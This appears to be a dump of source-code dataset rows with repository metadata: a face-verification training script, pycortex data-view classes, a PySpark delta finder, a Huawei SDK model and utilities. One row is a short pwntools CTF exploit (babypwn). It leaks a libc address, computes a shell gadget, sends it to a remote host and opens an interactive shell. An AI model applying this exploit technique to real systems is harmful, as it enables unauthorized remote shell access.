| column | dtype | values |
|---|---|---|
| hexsha | string | lengths 40–40 |
| size | int64 | 2–1.02M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | lengths 4–245 |
| max_stars_repo_name | string | lengths 6–130 |
| max_stars_repo_head_hexsha | string | lengths 40–40 |
| max_stars_repo_licenses | sequence | lengths 1–10 |
| max_stars_count | int64 | 1–191k ⌀ |
| max_stars_repo_stars_event_min_datetime | string | lengths 24–24 ⌀ |
| max_stars_repo_stars_event_max_datetime | string | lengths 24–24 ⌀ |
| max_issues_repo_path | string | lengths 4–245 |
| max_issues_repo_name | string | lengths 6–130 |
| max_issues_repo_head_hexsha | string | lengths 40–40 |
| max_issues_repo_licenses | sequence | lengths 1–10 |
| max_issues_count | int64 | 1–67k ⌀ |
| max_issues_repo_issues_event_min_datetime | string | lengths 24–24 ⌀ |
| max_issues_repo_issues_event_max_datetime | string | lengths 24–24 ⌀ |
| max_forks_repo_path | string | lengths 4–245 |
| max_forks_repo_name | string | lengths 6–130 |
| max_forks_repo_head_hexsha | string | lengths 40–40 |
| max_forks_repo_licenses | sequence | lengths 1–10 |
| max_forks_count | int64 | 1–105k ⌀ |
| max_forks_repo_forks_event_min_datetime | string | lengths 24–24 ⌀ |
| max_forks_repo_forks_event_max_datetime | string | lengths 24–24 ⌀ |
| content | string | lengths 2–1.02M |
| avg_line_length | float64 | 1–958k |
| max_line_length | int64 | 1–987k |
| alphanum_fraction | float64 | 0–1 |
| content_no_comment | string | lengths 0–1.01M |
| is_comment_constant_removed | bool | 2 classes |
| is_sharp_comment_removed | bool | 1 class |
1c4a6340c5d62211f6a45bfb0967b64e8ecde7eb | 1,355 | py | Python | src/slim_train.py | limxuanyu127/seesawfacenet_pytorch | d975f12cb48b53508ca7ea42c5b0b459eb73a2bc | ["MIT"] | null | null | null | src/slim_train.py | limxuanyu127/seesawfacenet_pytorch | d975f12cb48b53508ca7ea42c5b0b459eb73a2bc | ["MIT"] | null | null | null | src/slim_train.py | limxuanyu127/seesawfacenet_pytorch | d975f12cb48b53508ca7ea42c5b0b459eb73a2bc | ["MIT"] | null | null | null |
from config import get_config
from slim_Learner import face_learner
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='for face verification')
parser.add_argument("-e", "--epochs", help="training epochs", default=16, type=int)
parser.add_argument("-net", "--net_mode", help="which network, [ir, ir_se, mobilefacenet,seesawFaceNet]",default='seesawFaceNet', type=str)
parser.add_argument("-depth", "--net_depth", help="how many layers [50,100,152]", default=50, type=int)
parser.add_argument('-lr','--lr',help='learning rate',default=1e-1, type=float)
parser.add_argument("-b", "--batch_size", help="batch_size", default=196, type=int)
parser.add_argument("-w", "--num_workers", help="workers number", default=8, type=int)
parser.add_argument("-d", "--data_mode", help="use which database, [vgg, ms1m, emore, concat]",default='emore', type=str)
args = parser.parse_args()
conf = get_config()
if args.net_mode == 'seesawFaceNet':
conf.seesawFaceNet = True
else:
conf.net_mode = args.net_mode
conf.net_depth = args.net_depth
conf.lr = args.lr
conf.batch_size = args.batch_size
conf.num_workers = args.num_workers
conf.data_mode = args.data_mode
learner = face_learner(conf)
learner.train(conf, args.epochs)
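# Usage sketch (not part of the original script): one possible invocation,
# assuming the datasets referenced by get_config() have been prepared beforehand:
#
#     python src/slim_train.py -net seesawFaceNet -e 20 -b 128 -lr 0.1 -d emore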
| 43.709677 | 143 | 0.687823 | true | true |
1c4a64081f8217ebdf60f72541839ad38a6f2848 | 890 | py | Python | release/scripts/modules/bl_keymap_utils/__init__.py | rbabari/blender | 6daa85f14b2974abfc3d0f654c5547f487bb3b74 | ["Naumen", "Condor-1.1", "MS-PL"] | 365 | 2015-02-10T15:10:55.000Z | 2022-03-03T15:50:51.000Z | release/scripts/modules/bl_keymap_utils/__init__.py | rbabari/blender | 6daa85f14b2974abfc3d0f654c5547f487bb3b74 | ["Naumen", "Condor-1.1", "MS-PL"] | 45 | 2015-01-09T15:34:20.000Z | 2021-10-05T14:44:23.000Z | release/scripts/modules/bl_keymap_utils/__init__.py | rbabari/blender | 6daa85f14b2974abfc3d0f654c5547f487bb3b74 | ["Naumen", "Condor-1.1", "MS-PL"] | 172 | 2015-01-25T15:16:53.000Z | 2022-01-31T08:25:36.000Z |
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
__all__ = (
"io",
"keymap_from_toolbar",
"keymap_hierarchy",
)
| 34.230769 | 74 | 0.716854 | true | true |
1c4a65bb65df12ad239c522acfad3662a7231d1a | 15,278 | py | Python | cortex/dataset/views.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | ["BSD-2-Clause"] | 423 | 2015-01-06T02:46:46.000Z | 2022-03-23T17:20:38.000Z | cortex/dataset/views.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | ["BSD-2-Clause"] | 243 | 2015-01-03T02:10:03.000Z | 2022-03-31T19:29:48.000Z | cortex/dataset/views.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | ["BSD-2-Clause"] | 136 | 2015-03-23T20:35:59.000Z | 2022-03-09T13:39:10.000Z |
import json
import h5py
import numpy as np
from six import string_types
from .. import options
from .braindata import BrainData, VolumeData, VertexData
default_cmap = options.config.get("basic", "default_cmap")
def normalize(data):
if isinstance(data, tuple):
if len(data) == 3:
if data[0].dtype == np.uint8:
return VolumeRGB(data[0][...,0], data[0][...,1], data[0][...,2], *data[1:])
return Volume(*data)
elif len(data) == 2:
return Vertex(*data)
else:
raise TypeError("Invalid input for Dataview")
elif isinstance(data, Dataview):
return data
else:
raise TypeError("Invalid input for Dataview")
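# Illustration of the dispatch above (arrays and names are hypothetical;
# "S1"/"fullhead" stand in for a subject and transform registered in the
# pycortex database):
#
#     normalize((np.zeros((32, 100, 100)), "S1", "fullhead"))  # -> Volume
#     normalize((np.zeros(300000), "S1"))                      # -> Vertex
#     normalize([1, 2, 3])                                     # raises TypeError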
def _from_hdf_data(h5, name, xfmname=None, **kwargs):
"""Decodes a __hash named node from an HDF file into the
constituent Vertex or Volume object"""
dnode = h5.get("/data/%s"%name)
if dnode is None:
dnode = h5.get(name)
attrs = {k: u(v) for (k, v) in dnode.attrs.items()}
subj = attrs['subject']
#support old style xfmname saving as attribute
if xfmname is None and 'xfmname' in attrs:
xfmname = attrs['xfmname']
mask = None
if 'mask' in attrs:
if attrs['mask'].startswith("__"):
mask = h5['/subjects/%s/transforms/%s/masks/%s'%(attrs['subject'], xfmname, attrs['mask'])].value
else:
mask = attrs['mask']
#support old style RGB volumes
if dnode.dtype == np.uint8 and dnode.shape[-1] in (3, 4):
alpha = None
if dnode.shape[-1] == 4:
alpha = dnode[..., 3]
if xfmname is None:
return VertexRGB(dnode[...,0], dnode[...,1], dnode[...,2], subj,
alpha=alpha, **kwargs)
return VolumeRGB(dnode[...,0], dnode[...,1], dnode[...,2], subj, xfmname,
alpha=alpha, mask=mask, **kwargs)
if xfmname is None:
return Vertex(dnode, subj, **kwargs)
return Volume(dnode, subj, xfmname, mask=mask, **kwargs)
def _from_hdf_view(h5, data, xfmname=None, vmin=None, vmax=None, **kwargs):
if isinstance(data, string_types):
return _from_hdf_data(h5, data, xfmname=xfmname, vmin=vmin, vmax=vmax, **kwargs)
if len(data) == 2:
dim1 = _from_hdf_data(h5, data[0], xfmname=xfmname[0])
dim2 = _from_hdf_data(h5, data[1], xfmname=xfmname[1])
cls = Vertex2D if isinstance(dim1, Vertex) else Volume2D
return cls(dim1, dim2, vmin=vmin[0], vmin2=vmin[1],
vmax=vmax[0], vmax2=vmax[1], **kwargs)
elif len(data) == 4:
red, green, blue = [_from_hdf_data(h5, d, xfmname=xfmname) for d in data[:3]]
alpha = None
if data[3] is not None:
alpha = _from_hdf_data(h5, data[3], xfmname=xfmname)
cls = VertexRGB if isinstance(red, Vertex) else VolumeRGB
return cls(red, green, blue, alpha=alpha, **kwargs)
else:
raise ValueError("Invalid Dataview specification")
class Dataview(object):
def __init__(self, cmap=None, vmin=None, vmax=None, description="", state=None, **kwargs):
if self.__class__ == Dataview:
raise TypeError('Cannot directly instantiate Dataview objects')
self.cmap = cmap if cmap is not None else default_cmap
self.vmin = vmin
self.vmax = vmax
self.state = state
self.attrs = kwargs
if 'priority' not in self.attrs:
self.attrs['priority'] = 1
self.description = description
def copy(self, *args, **kwargs):
kwargs.update(self.attrs)
return self.__class__(*args,
cmap=self.cmap,
vmin=self.vmin,
vmax=self.vmax,
description=self.description,
state=self.state,
**kwargs)
@property
def priority(self):
return self.attrs['priority']
@priority.setter
def priority(self, value):
self.attrs['priority'] = value
def to_json(self, simple=False):
if simple:
return dict()
desc = self.description
if hasattr(desc, 'decode'):
desc = desc.decode()
sdict = dict(
state=self.state,
attrs=self.attrs.copy(),
desc=desc)
try:
sdict.update(dict(
cmap=[self.cmap],
vmin=[self.vmin if self.vmin is not None else np.percentile(np.nan_to_num(self.data), 1)],
vmax=[self.vmax if self.vmax is not None else np.percentile(np.nan_to_num(self.data), 99)]
))
except AttributeError:
pass
return sdict
@staticmethod
def from_hdf(node):
data = json.loads(u(node[0]))
desc = node[1]
try:
cmap = json.loads(u(node[2]))
except:
cmap = u(node[2])
vmin = json.loads(u(node[3]))
vmax = json.loads(u(node[4]))
state = json.loads(u(node[5]))
attrs = json.loads(u(node[6]))
try:
xfmname = json.loads(u(node[7]))
except ValueError:
xfmname = None
if not isinstance(vmin, list):
vmin = [vmin]
if not isinstance(vmax, list):
vmax = [vmax]
if not isinstance(cmap, list):
cmap = [cmap]
if len(data) == 1:
xfm = None if xfmname is None else xfmname[0]
return _from_hdf_view(node.file, data[0], xfmname=xfm, cmap=cmap[0], description=desc,
vmin=vmin[0], vmax=vmax[0], state=state, **attrs)
else:
            views = [_from_hdf_view(node.file, d, xfmname=x) for d, x in zip(data, xfmname)]
raise NotImplementedError
def _write_hdf(self, h5, name="data", data=None, xfmname=None):
views = h5.require_group("/views")
view = views.require_dataset(name, (8,), h5py.special_dtype(vlen=str))
view[0] = json.dumps(data)
view[1] = self.description
try:
view[2] = json.dumps([self.cmap])
view[3] = json.dumps([self.vmin])
view[4] = json.dumps([self.vmax])
except AttributeError:
#For VolumeRGB/Vertex, there is no cmap/vmin/vmax
view[2] = "null"
view[3:5] = "null"
view[5] = json.dumps(self.state)
view[6] = json.dumps(self.attrs)
view[7] = json.dumps(xfmname)
return view
@property
def raw(self):
from matplotlib import colors, cm, pyplot as plt
import glob, os
# Get colormap from matplotlib or pycortex colormaps
        ## -- redundant code, here and in cortex/quickflat.py -- ##
if isinstance(self.cmap, string_types):
if not self.cmap in cm.__dict__:
# unknown colormap, test whether it's in pycortex colormaps
cmapdir = options.config.get('webgl', 'colormaps')
colormaps = glob.glob(os.path.join(cmapdir, "*.png"))
colormaps = dict(((os.path.split(c)[1][:-4],c) for c in colormaps))
if not self.cmap in colormaps:
                    raise Exception('Unknown color map!')
I = plt.imread(colormaps[self.cmap])
cmap = colors.ListedColormap(np.squeeze(I))
# Register colormap while we're at it
cm.register_cmap(self.cmap,cmap)
else:
cmap = cm.get_cmap(self.cmap)
elif isinstance(self.cmap, colors.Colormap):
cmap = self.cmap
# Normalize colors according to vmin, vmax
norm = colors.Normalize(self.vmin, self.vmax)
cmapper = cm.ScalarMappable(norm=norm, cmap=cmap)
color_data = cmapper.to_rgba(self.data.flatten()).reshape(self.data.shape+(4,))
# rollaxis puts the last color dimension first, to allow output of separate channels: r,g,b,a = dataset.raw
color_data = (np.clip(color_data, 0, 1) * 255).astype(np.uint8)
return np.rollaxis(color_data, -1)
class Multiview(Dataview):
def __init__(self, views, description=""):
for view in views:
if not isinstance(view, Dataview):
raise TypeError("Must be a View object!")
raise NotImplementedError
self.views = views
def uniques(self, collapse=False):
for view in self.views:
for sv in view.uniques(collapse=collapse):
yield sv
class Volume(VolumeData, Dataview):
"""
Encapsulates a 3D volume or 4D volumetric movie. Includes information on how
the volume should be colormapped for display purposes.
Parameters
----------
data : ndarray
The data. Can be 3D with shape (z,y,x), 1D with shape (v,) for masked data,
4D with shape (t,z,y,x), or 2D with shape (t,v). For masked data, if the
size of the given array matches any of the existing masks in the database,
that mask will automatically be loaded. If it does not, an error will be
raised.
subject : str
Subject identifier. Must exist in the pycortex database.
xfmname : str
Transform name. Must exist in the pycortex database.
mask : ndarray, optional
Binary 3D array with shape (z,y,x) showing which voxels are selected.
If masked data is given, the mask will automatically be loaded if it
exists in the pycortex database.
cmap : str or matplotlib colormap, optional
Colormap (or colormap name) to use. If not given defaults to matplotlib
default colormap.
vmin : float, optional
Minimum value in colormap. If not given, defaults to the 1st percentile
of the data.
vmax : float, optional
Maximum value in colormap. If not given defaults to the 99th percentile
of the data.
description : str, optional
String describing this dataset. Displayed in webgl viewer.
**kwargs
        All additional arguments in kwargs are passed to the VolumeData and Dataview constructors.
"""
def __init__(self, data, subject, xfmname, mask=None,
cmap=None, vmin=None, vmax=None, description="", **kwargs):
super(Volume, self).__init__(data, subject, xfmname, mask=mask,
cmap=cmap, vmin=vmin, vmax=vmax,
description=description, **kwargs)
# set vmin and vmax
self.vmin = self.vmin if self.vmin is not None else \
np.percentile(np.nan_to_num(self.data), 1)
self.vmax = self.vmax if self.vmax is not None else \
np.percentile(np.nan_to_num(self.data), 99)
def _write_hdf(self, h5, name="data"):
datanode = VolumeData._write_hdf(self, h5)
viewnode = Dataview._write_hdf(self, h5, name=name,
data=[self.name],
xfmname=[self.xfmname])
return viewnode
@property
def raw(self):
r, g, b, a = super(Volume, self).raw
return VolumeRGB(r, g, b, self.subject, self.xfmname, a,
description=self.description, state=self.state,
**self.attrs)
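# Usage sketch (not part of the module): constructing a Volume view from a raw
# (z, y, x) array; "S1" and "fullhead" are placeholder subject/transform names
# that would need to exist in the pycortex database.
#
#     import numpy as np
#     vol = Volume(np.random.randn(32, 100, 100), "S1", "fullhead",
#                  cmap="viridis", vmin=-2, vmax=2)
#     rgb = vol.raw  # colormapped uint8 channels wrapped in a VolumeRGB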
class Vertex(VertexData, Dataview):
"""
Encapsulates a 1D vertex map or 2D vertex movie. Includes information on how
the data should be colormapped for display purposes.
Parameters
----------
data : ndarray
The data. Can be 1D with shape (v,), or 2D with shape (t,v). Here, v can
be the number of vertices in both hemispheres, or the number of vertices
in either one of the hemispheres. In that case, the data for the other
hemisphere will be filled with zeros.
subject : str
Subject identifier. Must exist in the pycortex database.
cmap : str or matplotlib colormap, optional
Colormap (or colormap name) to use. If not given defaults to matplotlib
default colormap.
vmin : float, optional
Minimum value in colormap. If not given, defaults to the 1st percentile
of the data.
vmax : float, optional
Maximum value in colormap. If not given defaults to the 99th percentile
of the data.
description : str, optional
String describing this dataset. Displayed in webgl viewer.
**kwargs
        All additional arguments in kwargs are passed to the VertexData and Dataview constructors.
"""
def __init__(self, data, subject, cmap=None, vmin=None, vmax=None, description="", **kwargs):
super(Vertex, self).__init__(data, subject, cmap=cmap, vmin=vmin, vmax=vmax,
description=description, **kwargs)
# set vmin and vmax
self.vmin = self.vmin if self.vmin is not None else \
np.percentile(np.nan_to_num(self.data), 1)
self.vmax = self.vmax if self.vmax is not None else \
np.percentile(np.nan_to_num(self.data), 99)
def _write_hdf(self, h5, name="data"):
datanode = VertexData._write_hdf(self, h5)
viewnode = Dataview._write_hdf(self, h5, name=name, data=[self.name])
return viewnode
@property
def raw(self):
r, g, b, a = super(Vertex, self).raw
return VertexRGB(r, g, b, self.subject, a,
description=self.description, state=self.state,
**self.attrs)
def map(self, target_subj, surface_type='fiducial',
hemi='both', fs_subj=None, **kwargs):
"""Map this data from this surface to another surface
Calls `cortex.freesurfer.vertex_to_vertex()` with this
vertex object as the first argument.
NOTE: Requires either previous computation of mapping matrices
(with `cortex.db.get_mri_surf2surf_matrix`) or active
freesurfer environment.
Parameters
----------
target_subj : str
freesurfer subject to which to map
Other Parameters
----------------
kwargs map to `cortex.freesurfer.vertex_to_vertex()`
"""
# Input check
if hemi not in ['lh', 'rh', 'both']:
raise ValueError("`hemi` kwarg must be 'lh', 'rh', or 'both'")
# lazy load
from ..database import db
mats = db.get_mri_surf2surf_matrix(self.subject, surface_type,
hemi='both', target_subj=target_subj, fs_subj=fs_subj,
**kwargs)
new_data = [mats[0].dot(self.left), mats[1].dot(self.right)]
if hemi == 'both':
new_data = np.hstack(new_data)
elif hemi == 'lh':
new_data = np.hstack([new_data[0], np.nan * np.zeros(new_data[1].shape)])
elif hemi == 'rh':
new_data = np.hstack([np.nan * np.zeros(new_data[0].shape), new_data[1]])
vx = Vertex(new_data, target_subj, vmin=self.vmin, vmax=self.vmax, cmap=self.cmap)
return vx
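# Usage sketch (subject names are placeholders; the surf2surf matrices must
# already exist in the database, or an active freesurfer environment is needed):
#
#     vtx = Vertex(np.random.randn(300000), "S1")
#     vtx_fsavg = vtx.map("fsaverage", hemi="both")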
def u(s, encoding='utf8'):
try:
return s.decode(encoding)
except AttributeError:
return s
from .viewRGB import VolumeRGB, VertexRGB, Colors
from .view2D import Volume2D, Vertex2D
| 39.074169 | 115 | 0.582668 | true | true |
1c4a676f27ed3a73245add251cc9aa1a30f369df | 374 | py | Python | _ctfs/wargamesmy-19/babypwn/xpl.py | daniellimws/daniellimws.github.io | 464548e058ca423548cbe95c4ee38f856f9185c2 | ["MIT"] | 1 | 2019-01-31T16:50:12.000Z | 2019-01-31T16:50:12.000Z | _ctfs/wargamesmy-19/babypwn/xpl.py | daniellimws/daniellimws.github.io | 464548e058ca423548cbe95c4ee38f856f9185c2 | ["MIT"] | null | null | null | _ctfs/wargamesmy-19/babypwn/xpl.py | daniellimws/daniellimws.github.io | 464548e058ca423548cbe95c4ee38f856f9185c2 | ["MIT"] | 3 | 2019-03-04T12:46:18.000Z | 2021-05-18T16:10:44.000Z |
from pwn import *
# r = process("./babypwn")
r = remote("45.76.161.20", 19509)
leak = u32(r.recv(4))  # 4-byte libc address leaked by the binary
libc_base = leak - 0xd80 - 0x1d8000  # subtract the leaked pointer's offset into libc
log.info("Leaked: " + hex(libc_base))
sh = libc_base + 0x3d0d5  # address of a shell-spawning gadget in the remote libc
log.info("Shell: " + hex(sh))
sh = -(2**32 - sh) if sh > 0x7fffffff else sh  # the binary parses a signed 32-bit int
# pause()
r.sendline(str(sh))
# pause()
r.interactive()
# wgmy{b20208102bc4242bb10197edec8f3bb9}
| 23.375 | 45 | 0.660428 | true | true |
1c4a6843d62ed680a7b0c55c9e80f25fddaa013a | 47 | py | Python | Taekwon/Python/baseGrammar/codeup040.py | sonnysorry/codingtest | 478e0168e3209eb97b6b16910027bf12ccc3ccd0 | ["MIT"] | 2 | 2021-09-27T19:10:36.000Z | 2021-11-09T05:40:39.000Z | Taekwon/Python/baseGrammar/codeup040.py | sonnysorry/codingtest | 478e0168e3209eb97b6b16910027bf12ccc3ccd0 | ["MIT"] | 1 | 2021-11-15T14:56:54.000Z | 2021-11-15T14:56:54.000Z | Taekwon/Python/baseGrammar/codeup040.py | sonnysorry/codingtest | 478e0168e3209eb97b6b16910027bf12ccc3ccd0 | ["MIT"] | null | null | null |
a, b = input().split()
print(int(a) // int(b))
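# Sample run (floor division of two whitespace-separated integers):
#   input:  7 2
#   output: 3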
| 15.666667 | 23 | 0.531915 | true | true |
1c4a6896ce6f6954c7f299bc77e2b3cfe6d96de7 | 2,983 | py | Python | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/untag_device_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | ["Apache-2.0"] | 64 | 2020-06-12T07:05:07.000Z | 2022-03-30T03:32:50.000Z | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/untag_device_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | ["Apache-2.0"] | 11 | 2020-07-06T07:56:54.000Z | 2022-01-11T11:14:40.000Z | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/untag_device_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | ["Apache-2.0"] | 24 | 2020-06-08T11:42:13.000Z | 2022-03-04T06:44:08.000Z |
# coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UntagDeviceResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'body': 'str'
}
attribute_map = {
'body': 'body'
}
def __init__(self, body=None):
"""UntagDeviceResponse - a model defined in huaweicloud sdk"""
super(UntagDeviceResponse, self).__init__()
self._body = None
self.discriminator = None
if body is not None:
self.body = body
@property
def body(self):
"""Gets the body of this UntagDeviceResponse.
:return: The body of this UntagDeviceResponse.
:rtype: str
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this UntagDeviceResponse.
:param body: The body of this UntagDeviceResponse.
:type: str
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UntagDeviceResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 26.39823 | 79 | 0.546095 |
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UntagDeviceResponse(SdkResponse):
sensitive_list = []
openapi_types = {
'body': 'str'
}
attribute_map = {
'body': 'body'
}
def __init__(self, body=None):
super(UntagDeviceResponse, self).__init__()
self._body = None
self.discriminator = None
if body is not None:
self.body = body
@property
def body(self):
return self._body
@body.setter
def body(self, body):
self._body = body
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, UntagDeviceResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
1c4a68ab2bfe23ff9552b1c0fd938fc479058e3b | 3,557 | py | Python | blocks/find_delta/pyspark/lib.py | datayoga-io/datayoga | d88b23d21d49d60d14b3c72d54e11e5034f6c1f3 | ["Apache-2.0"] | 16 | 2022-01-24T07:45:16.000Z | 2022-03-07T08:27:13.000Z | blocks/find_delta/pyspark/lib.py | datayoga-io/datayoga | d88b23d21d49d60d14b3c72d54e11e5034f6c1f3 | ["Apache-2.0"] | null | null | null | blocks/find_delta/pyspark/lib.py | datayoga-io/datayoga | d88b23d21d49d60d14b3c72d54e11e5034f6c1f3 | ["Apache-2.0"] | 2 | 2022-01-19T07:46:16.000Z | 2022-01-24T12:25:09.000Z |
import pyspark.sql
import pyspark.sql.functions as F
import pyspark.sql.types as T
import logging
import collections
from typing import List
import functools
import operator
logger = logging.getLogger("dy_runner")
Delta = collections.namedtuple('Delta', 'insert update delete exclude')
def find_delta(
df_existing,
df_incoming,
business_keys: List[str],
columns: List[str],
include_deletes: bool = False,
exclusion_condition: str = ""
):
join_condition = functools.reduce(
operator.and_,
[
F.col(f"incoming.`{colname}`") == F.col(f"existing.`{colname}`") for colname in business_keys
]
)
# check if we need to include deletes. these are more costly since need to scan entire existing set
join_type = "leftouter"
if include_deletes:
join_type = "fullouter"
_all_rows = df_incoming.alias("incoming").join(df_existing.alias("existing"), join_condition, join_type)
#
# inserts - ones that didn't match existing business keys
#
df_insert = _all_rows.filter(
functools.reduce(
operator.and_,
[
F.col(f"existing.`{colname}`").isNull() for colname in business_keys
]
)
).select("incoming.*")
#
# deletes
#
if include_deletes:
# deletes are ones that didn't match incoming business keys
df_delete = _all_rows.filter(
functools.reduce(
operator.and_,
[
F.col(f"incoming.`{colname}`").isNull() for colname in business_keys
]
)
).select("existing.*")
else:
df_delete = None
#
# updates - ones that matched all business keys
#
if exclusion_condition and exclusion_condition != "":
# if we received an exclusion condition, apply it here.
# this is used to exclude rows altogether to save another join with the source
_all_rows = _all_rows.filter(~F.expr(exclusion_condition))
df_exclude = _all_rows.filter(F.expr(exclusion_condition))
else:
df_exclude = None
df_update = _all_rows.filter(join_condition)
# check if there was any change vs existing. take only specified columns or all shared columns if not explicitly specified
if columns and columns != []:
shared_cols = list(set(map(str.lower, df_incoming.columns)).intersection(
map(str.lower, df_existing.columns)).intersection(map(str.lower, columns)))
else:
shared_cols = list(set(map(str.lower, df_incoming.columns)).intersection(map(str.lower, df_existing.columns)))
# fetch the IDs, then join again to get the full record that matched
original_columns = list(set(map(str.lower, shared_cols+business_keys)))
df_update_ids = df_update.select(
[F.col(f"incoming.{colname}") for colname in original_columns]
).exceptAll(df_update.select(
[F.col(f"existing.{colname}") for colname in original_columns]
))
join_condition_ids = functools.reduce(
operator.and_,
[
F.col(f"incoming.`{colname}`") == F.col(f"update_ids.`{colname}`") for colname in business_keys
]
)
# we join again to get the complete rows of the incoming records that have been updated
df_update = _all_rows.join(df_update_ids.alias("update_ids"), join_condition_ids, "inner").select("incoming.*")
return Delta(
insert=df_insert,
update=df_update,
delete=df_delete,
exclude=df_exclude
)
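# Usage sketch (assumes an active SparkSession named `spark`; table contents
# are illustrative):
#
#     existing = spark.createDataFrame([(1, "a"), (2, "b")], ["id", "val"])
#     incoming = spark.createDataFrame([(2, "B"), (3, "c")], ["id", "val"])
#     delta = find_delta(existing, incoming, business_keys=["id"],
#                        columns=["val"], include_deletes=True)
#     delta.insert.show()  # id=3 is new
#     delta.update.show()  # id=2 changed from "b" to "B"
#     delta.delete.show()  # id=1 no longer appears in incoming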
| 33.556604 | 126 | 0.648299 | true | true |
1c4a68f1c5b6a23e89d1c5fd877e88f0987b2ccf | 2,069 | py | Python | common/utils.py | Spearis666/SARA | 99f4d70053faaf15c89bdb5a6ef6b624853b1f9f | ["MIT"] | null | null | null | common/utils.py | Spearis666/SARA | 99f4d70053faaf15c89bdb5a6ef6b624853b1f9f | ["MIT"] | null | null | null | common/utils.py | Spearis666/SARA | 99f4d70053faaf15c89bdb5a6ef6b624853b1f9f | ["MIT"] | null | null | null |
import os, sys
# Check if the folder exists, and try to create it if not
def checkFolder(path):
if os.path.exists(path):
return True
else:
try:
os.makedirs(path)
return True
except OSError:
return False
# List files in directory with specific extensions
def getFilesIn(directory, extensions, subdir=False):
filePaths = []
for root, directories, files in os.walk(directory):
if not subdir:
del(directories[:])
for filename in files:
for extension in extensions:
if filename.endswith(extension):
filepath = os.path.join(root, filename)
filePaths.append(filepath)
break
return filePaths
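# Example (hypothetical path): collect .py and .txt files directly under
# /tmp/project, ignoring subdirectories:
#
#     files = getFilesIn("/tmp/project", [".py", ".txt"], subdir=False)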
# Get script directory
def getScriptPath():
return os.path.dirname(os.path.realpath(sys.argv[0]))
# Return size of one or multiples files
def getSize(filesList):
totalSizeBytes = 0
for filePath in filesList:
totalSizeBytes += os.path.getsize(filePath)
return totalSizeBytes
# Make paths relative (they need to be relative for the archiver to retain
# the directory structure; useful when handling a bunch of files/folders,
# e.g. a Blu-ray/DVD dump)
def makeRelativePath(rootPath, filesList):
for i, _ in enumerate(filesList):
filesList[i] = filesList[i].replace(rootPath + "/", "")
return filesList
# The million dollar question ? YES or NO ? :p
def queryYesNo(question, default="no"):
valid = {"yes": True, "y": True,
"no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
print(question + prompt)
choice = input("> ").lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
print("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
| 26.87013 | 71 | 0.61189 | true | true |
